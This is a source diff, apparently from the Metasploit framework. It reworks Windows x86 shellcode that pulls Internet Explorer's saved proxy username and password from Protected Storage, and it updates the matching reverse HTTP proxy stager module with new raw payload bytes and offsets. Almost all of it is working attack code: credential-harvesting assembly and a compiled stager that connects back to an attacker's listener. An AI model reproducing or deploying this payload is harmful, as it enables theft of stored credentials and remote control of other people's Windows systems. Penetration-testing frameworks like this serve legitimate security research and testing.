diff --git a/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm b/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm old mode 100755 new mode 100644 index 978272be2c..acd1afc053 --- a/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm +++ b/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm @@ -6,66 +6,32 @@ [BITS 32] ; Input: EBP must be the address of 'api_call' -; Output: top element of stack will be pointer to null-terminated password and second -; will be pointer to null-terminated username of the Proxy saved in IE - - -;mov edx, "1_r?" -;call print_eax +; Output: top element of stack will be pointer to null-terminated password and +; second will be pointer to null-terminated username of the Proxy saved in IE +pushad jmp after_functions -alloc_memory: ; returns address to allocation in eax +alloc_memory: ; returns address to allocation in eax push byte 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT - push 0x00001000 ; allocate 1000 Byte for each variable (could be less I guess) + push 0x1000 ; allocate 1000 byte for each variable (could be less) push 0 ; NULL as we dont care where the allocation is push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXE$ - ret - -after_functions: - -; allocate memory for variables - - alloc_ppsDataLen: - call alloc_memory - push eax - - alloc_ppsData: - call alloc_memory - push eax - - alloc_pitemName: - call alloc_memory - push eax - - alloc_pspEnumItems: - call alloc_memory - push eax - - alloc_psubTypeGUID: - call alloc_memory - push eax - - alloc_pEnumSubtypes: - call alloc_memory - push eax - - alloc_pTypeGUID: - call alloc_memory - push eax - - alloc_pEnumPStoreTypes: - call alloc_memory - push eax ; save on stack - - alloc_pPStore: - call alloc_memory - push eax ; save on stack - - -load_pstorec: ; loads the pstorec.dll + ret ; + ; +after_functions: ; + ; + ; allocate memory for variables and save pointers on stack + mov bl, 9 ; + alloc_loop: ; + call alloc_memory ; + push eax ; save allocation address on stack + dec bl ; + jnz alloc_loop ; + ; +load_pstorec: ; loads the pstorec.dll push 0x00636572 ; Push the bytes 'pstorec',0 onto the stack. push 0x6f747370 ; ... push esp ; Push a pointer to the 'pstorec',0 string on the stack. @@ -73,190 +39,171 @@ load_pstorec: ; loads the pstorec.dll call ebp ; LoadLibraryA( "pstorec" ) ; this should leave a handle to the pstorec ; DLL-Module in eax - mov ebx, eax ; save handle in ebx - pop edx ; remove string from stack + pop edx ; remove 'pstorec' string from stack pop edx - - -PStoreCreateInstance_PStore:; returns address to PStore (00942524) in pPStore (0012FEF4) - pop edi ; pop pPstore - push edi ; restore stack - - push 0 - push 0 - push 0 + +PStoreCreateInstance_PStore: + ; returns address to PStore in pPStore + pop edi ; pop pPstore + push edi ; restore stack + ; + push 0 ; + push 0 ; + push 0 ; push edi ; arg4: pPstore push 0x2664BDDB ; hash ( "pstorec.dll", "PStoreCreateInstance" ) call ebp ; PstoreCreateInstance(address, 0, 0, 0) - -PStore.EnumTypes: ; returns address to EnumPStoreTypes (00942568) in pEnumPStoreTypes (0012FEE8) - pop eax ; pop pPstore - pop edx ; pop pEnumPstoreTypes - push edx ; push them again - push eax - - push edx ; arg1: pEnumPstoreTypes - push 0 ; arg2: NULL - push 0 ; arg3: NULL - mov eax, [eax] ; load base address of PStore in eax - push eax ; push base address of PStore (this) - mov edx, [eax] ; get function address of IPStore::EnumTypes in pstorec.dll - mov edx, [edx+0x38] ;&EnumTypes() = *(*(&PStore)+0x38) - ;add edx, 0x00005586 - call edx ; call IPStore::EnumTypes - + ; +PStore.EnumTypes: ; returns address to EnumPStoreTypes in pEnumPStoreTypes + pop eax ; pop pPstore + pop edx ; pop pEnumPstoreTypes + push edx ; restore stack + push eax ; + ; + push edx ; arg1: pEnumPstoreTypes + push 0 ; arg2: NULL + push 0 ; arg3: NULL + mov eax, [eax] ; load base address of PStore in eax + push eax ; push base address of PStore (this) + mov edx, [eax] ; get function address of IPStore::EnumTypes in pstorec.dll + mov edx, [edx+0x38] ; &EnumTypes() = *(*(&PStore)+0x38) + call edx ; call IPStore::EnumTypes mov edi, 0x5e7e8100 ; Value of pTypeGUID if Password is IE:Password-Protected - + ; EnumPStoreTypes.raw_Next: - pop eax ; pop pPStore - pop edx ; pop pEnumPStoreTypes - pop ecx ; pop pTypeGUID - push ecx ; push them again - push edx - push eax - - push 0 ; arg1: NULL - push ecx ; arg2: pTypeGUID - push 1 ; arg3: 1 - mov edx, [edx] ; load base address of EnumPStoreTypes (00942568) - push edx ; push base address of EnumPStoreTypes (this) - mov edx, [edx] ; get function address of EnumPStoreTypes::raw_Next in pstorec.dll - mov edx, [edx+0x0C] ; &RawNext = *(*(*(&EnumPStoreTypes))+0x0C) - ;add edx, 0x00004E4F - call edx ; call EnumPStoreTypes::raw_Next - - mov eax, [esp+8] - mov eax, [eax] - - mov edx, 0x00000000 - cmp edx, eax - jz no_auth ; no Password found - cmp edi, eax ; do this until TypeGUID indicates "IE Password Protected sites" + pop eax ; pop pPStore + pop edx ; pop pEnumPStoreTypes + pop ecx ; pop pTypeGUID + push ecx ; restore stack + push edx ; + push eax ; + ; + push 0 ; arg1: NULL + push ecx ; arg2: pTypeGUID + push 1 ; arg3: 1 + mov edx, [edx] ; load base address of EnumPStoreTypes + push edx ; push base address of EnumPStoreTypes (this) + mov edx, [edx] ; get function address of EnumPStoreTypes::raw_Next in pstorec.dll + mov edx, [edx+0x0C] ; &RawNext = *(*(*(&EnumPStoreTypes))+0x0C) + call edx ; call EnumPStoreTypes::raw_Next + ; + mov eax, [esp+8] ; + mov eax, [eax] ; + ; + test eax, eax ; + jz no_auth ; no Password found + cmp edi, eax ; do this until TypeGUID indicates "IE Password Protected sites" jne EnumPStoreTypes.raw_Next - + ; PStore.EnumSubtypes: ; returns address to EnumSubtypes () in pEnumSubtypes () pop eax ; pop pPstore pop edx ; pop pEnumPstoreTypes - pop ecx ; pop pTypeGUID - pop edi ; pop pEnumSubtypes + pop ecx ; pop pTypeGUID + pop edi ; pop pEnumSubtypes push edi ; restore stack - push ecx - push edx - push eax - + push ecx ; + push edx ; + push eax ; + ; push edi ; arg1: pEnumSubtypes push 0 ; arg2: NULL - push ecx ; arg3: pTypeGUID + push ecx ; arg3: pTypeGUID push 0 ; arg4: NULL mov eax, [eax] ; load base address of PStore in eax push eax ; push base address of PStore (this) mov edx, [eax] ; get function address of IPStore::EnumSubtypes in pstorec.dll mov edx, [edx+0x3C] ; &Pstore.EnumSubTypes() = *(*(*(&PStore))+0x3C) - ;add edx, 0x0000560C call edx ; call IPStore::EnumSubtypes - + ; EnumSubtypes.raw_Next: mov eax, [esp+0x0C] ; pop pEnumSubtypes mov edx, [esp+0x10] ; pop psubTypeGUID - - push 0 ; arg1: NULL - push edx ; arg2: psubTypeGUID - push 1 ; arg3: 1 - mov eax, [eax] ; load base address of EnumSubtypes in eax - push eax ; push base address of EnumSubtypes (this) - mov edx, [eax] ; get function address of raw_Next in pstorec.dll - mov edx, [edx+0x0C] ; &(EnumSubtypes.raw_Next) = *(*(&EnumSubtypes)+0x0C) - ;add edx, 0x00004E4F - call edx ; call EnumSubtypes.raw_Next - + ; + push 0 ; arg1: NULL + push edx ; arg2: psubTypeGUID + push 1 ; arg3: 1 + mov eax, [eax] ; load base address of EnumSubtypes in eax + push eax ; push base address of EnumSubtypes (this) + mov edx, [eax] ; get function address of raw_Next in pstorec.dll + mov edx, [edx+0x0C] ; &(EnumSubtypes.raw_Next) = *(*(&EnumSubtypes)+0x0C) + call edx ; call EnumSubtypes.raw_Next + ; PStore.EnumItems: - pop eax ; pop pPstore - pop ecx - pop edx ; pop pTypeGUID - push edx ; restore stack - push ecx - push eax + pop eax ; pop pPstore + pop ecx ; + pop edx ; pop pTypeGUID + push edx ; restore stack + push ecx ; + push eax ; mov ecx, [esp+0x10] ; pop psubTypeGUID mov edi, [esp+0x14] ; pop pspEnumItems - - push edi ; arg1: pspEnumItems - push 0 ; arg2: NULL - push ecx ; arg3: psubTypeGUID - push edx ; arg4: pTyoeGUID - push 0 ; arg5: NULL - mov eax, [eax] ; load base address of PStore in eax - push eax ; push base address of PStore (this) - mov edx, [eax] ; get function address of IPStore::Enumitems in pstorec.dll - ;mov edx, [edx] - mov edx, [edx+0x54] - ;add edx, 0x000056A0 + ; + push edi ; arg1: pspEnumItems + push 0 ; arg2: NULL + push ecx ; arg3: psubTypeGUID + push edx ; arg4: pTyoeGUID + push 0 ; arg5: NULL + mov eax, [eax] ; load base address of PStore in eax + push eax ; push base address of PStore (this) + mov edx, [eax] ; get function address of IPStore::Enumitems in pstorec.dll + mov edx, [edx+0x54] ; call edx ; call IPStore::Enumitems - + ; spEnumItems.raw_Next: mov eax, [esp+0x14] ; pop pspEnumItems mov ecx, [esp+0x18] ; pop pitemName - - push 0 ; arg1: NULL - push ecx ; arg2: pitemName - push 1 ; arg3: 1 - mov eax, [eax] ; load base address of spEnumItems in eax - push eax ; push base addres of spEnumItems (this) - mov edx, [eax] ; get function address of raw_Next in pstorec.dll - mov edx, [edx+0x0C] - ;add edx, 0x000048D1 - call edx - + ; + push 0 ; arg1: NULL + push ecx ; arg2: pitemName + push 1 ; arg3: 1 + mov eax, [eax] ; load base address of spEnumItems in eax + push eax ; push base addres of spEnumItems (this) + mov edx, [eax] ; get function address of raw_Next in pstorec.dll + mov edx, [edx+0x0C] ; + call edx ; + ; PStore.ReadItem: - pop eax ; pop pPStore - push eax - - push 0 ; arg1: NULL - push 0 ; arg2: NULL (stiinfo not needed) + pop eax ; pop pPStore + push eax ; + ; + push 0 ; arg1: NULL + push 0 ; arg2: NULL (stiinfo not needed) mov ecx, [esp+0x24] ; pop ppsData (8. Element) - push ecx ; arg3: ppsData + push ecx ; arg3: ppsData mov ecx, [esp+0x2C] ; pop ppsDataLen - push ecx ; arg4: ppsDataLen (not needed?) + push ecx ; arg4: ppsDataLen (not needed?) mov ecx, [esp+0x28] ; pop pitemName (7. Element) - mov ecx, [ecx] - push ecx ; arg5: pitemName + mov ecx, [ecx] ; + push ecx ; arg5: pitemName mov ecx, [esp+0x24] ; pop psubTypeGUID (5. Element) - push ecx ; arg6: psubTypeGUID + push ecx ; arg6: psubTypeGUID mov ecx, [esp+0x20] ; pop pTypeGUID (3. Element) - push ecx ; arg7: pTypeGUID - push 0 ; arg8: NULL - mov eax, [eax] ; load base address of PStore in eax - push eax ; push base addres of PStore (this) - mov edx, [eax] ; get function address of IPStore::ReadItem in pstorec.dll - mov edx, [edx+0x44] - ;add edx, 0x000042B6 - call edx - + push ecx ; arg7: pTypeGUID + push 0 ; arg8: NULL + mov eax, [eax] ; load base address of PStore in eax + push eax ; push base addres of PStore (this) + mov edx, [eax] ; get function address of IPStore::ReadItem in pstorec.dll + mov edx, [edx+0x44] ; + call edx ; + ; split_user_pass: mov eax, [esp+0x1C] ; eax = ppsData - mov eax, [eax] ; now eax contains pointer to "user:pass" - push eax ; push pointer to user + mov eax, [eax] ; now eax contains pointer to "user:pass" + push eax ; push pointer to user mov cl, byte 0x3a ; load ":" in ecx mov dl, byte [eax] ; load first byte of ppsData in edx - cmp cl, dl - jz no_auth - loop_split: - inc eax - mov dl, byte [eax] - cmp cl, dl - jnz loop_split ; increase eax until it points to ":" - + cmp cl, dl ; + jz no_auth ; + loop_split: ; + inc eax ; + mov dl, byte [eax] ; + cmp cl, dl ; + jnz loop_split ; increase eax until it points to ":" + ; mov [eax], byte 0x00 ; replace ":" with 00 - inc eax - push eax ; push pointer to pass - + inc eax ; + push eax ; push pointer to pass + ; no_auth: -; mov edi, 0x00000006 ; counter for loop -;free_memory: ; doesn't work yet -; push 0x00008000 -; push 0x00000000 -; push 0x300F2F0B ; hash( "kernel32.dll", "VirtualFree" ) -; call ebp -; dec di -; jnz free_memory diff --git a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb index 7f256ff57e..0be8d5f383 100644 --- a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb +++ b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb @@ -33,16 +33,16 @@ module Metasploit3 { 'Offsets' => { - # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) - # 'EXITFUNC' => [ 290, 'V' ], - 'LPORT' => [ 547, 'v' ], # Not a typo, really little endian + 'EXITFUNC' => [ 579, 'V' ], + 'LPORT' => [ 499, 'v' ], # Not a typo, really little endian }, 'Payload' => - +# Built on Thu Mar 6 02:37:12 2014 + # Name: stager_reverse_http_proxy_pstore -# Length: 697 bytes -# LEPort Offset: 547 -# ExitFunk Offset: 627 +# Length: 649 bytes +# LEPort Offset: 499 +# ExitFunk Offset: 579 "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + @@ -52,18 +52,15 @@ module Metasploit3 "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + -"\xEB\x16\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x10\x00\x00\x6A\x00" + -"\x68\x58\xA4\x53\xE5\xFF\xD5\xC3\xE8\xE5\xFF\xFF\xFF\x50\xE8\xDF" + -"\xFF\xFF\xFF\x50\xE8\xD9\xFF\xFF\xFF\x50\xE8\xD3\xFF\xFF\xFF\x50" + -"\xE8\xCD\xFF\xFF\xFF\x50\xE8\xC7\xFF\xFF\xFF\x50\xE8\xC1\xFF\xFF" + -"\xFF\x50\xE8\xBB\xFF\xFF\xFF\x50\xE8\xB5\xFF\xFF\xFF\x50\x68\x72" + -"\x65\x63\x00\x68\x70\x73\x74\x6F\x54\x68\x4C\x77\x26\x07\xFF\xD5" + -"\x89\xC3\x5A\x5A\x5F\x57\x6A\x00\x6A\x00\x6A\x00\x57\x68\xDB\xBD" + -"\x64\x26\xFF\xD5\x58\x5A\x52\x50\x52\x6A\x00\x6A\x00\x8B\x00\x50" + -"\x8B\x10\x8B\x52\x38\xFF\xD2\xBF\x00\x81\x7E\x5E\x58\x5A\x59\x51" + -"\x52\x50\x6A\x00\x51\x6A\x01\x8B\x12\x52\x8B\x12\x8B\x52\x0C\xFF" + -"\xD2\x8B\x44\x24\x08\x8B\x00\xBA\x00\x00\x00\x00\x39\xC2\x0F\x84" + -"\xB1\x00\x00\x00\x39\xC7\x75\xD4\x58\x5A\x59\x5F\x57\x51\x52\x50" + +"\x60\xEB\x16\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x10\x00\x00\x6A" + +"\x00\x68\x58\xA4\x53\xE5\xFF\xD5\xC3\xB3\x09\xE8\xE3\xFF\xFF\xFF" + +"\x50\xFE\xCB\x75\xF6\x68\x72\x65\x63\x00\x68\x70\x73\x74\x6F\x54" + +"\x68\x4C\x77\x26\x07\xFF\xD5\x5A\x5A\x5F\x57\x6A\x00\x6A\x00\x6A" + +"\x00\x57\x68\xDB\xBD\x64\x26\xFF\xD5\x58\x5A\x52\x50\x52\x6A\x00" + +"\x6A\x00\x8B\x00\x50\x8B\x10\x8B\x52\x38\xFF\xD2\xBF\x00\x81\x7E" + +"\x5E\x58\x5A\x59\x51\x52\x50\x6A\x00\x51\x6A\x01\x8B\x12\x52\x8B" + +"\x12\x8B\x52\x0C\xFF\xD2\x8B\x44\x24\x08\x8B\x00\x85\xC0\x0F\x84" + +"\xB1\x00\x00\x00\x39\xC7\x75\xD9\x58\x5A\x59\x5F\x57\x51\x52\x50" + "\x57\x6A\x00\x51\x6A\x00\x8B\x00\x50\x8B\x10\x8B\x52\x3C\xFF\xD2" + "\x8B\x44\x24\x0C\x8B\x54\x24\x10\x6A\x00\x52\x6A\x01\x8B\x00\x50" + "\x8B\x10\x8B\x52\x0C\xFF\xD2\x58\x59\x5A\x52\x51\x50\x8B\x4C\x24" + @@ -86,11 +83,7 @@ module Metasploit3 "\x68\x00\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53" + "\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF" + "\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5E" + -"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF" - - - - } +"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"} )) end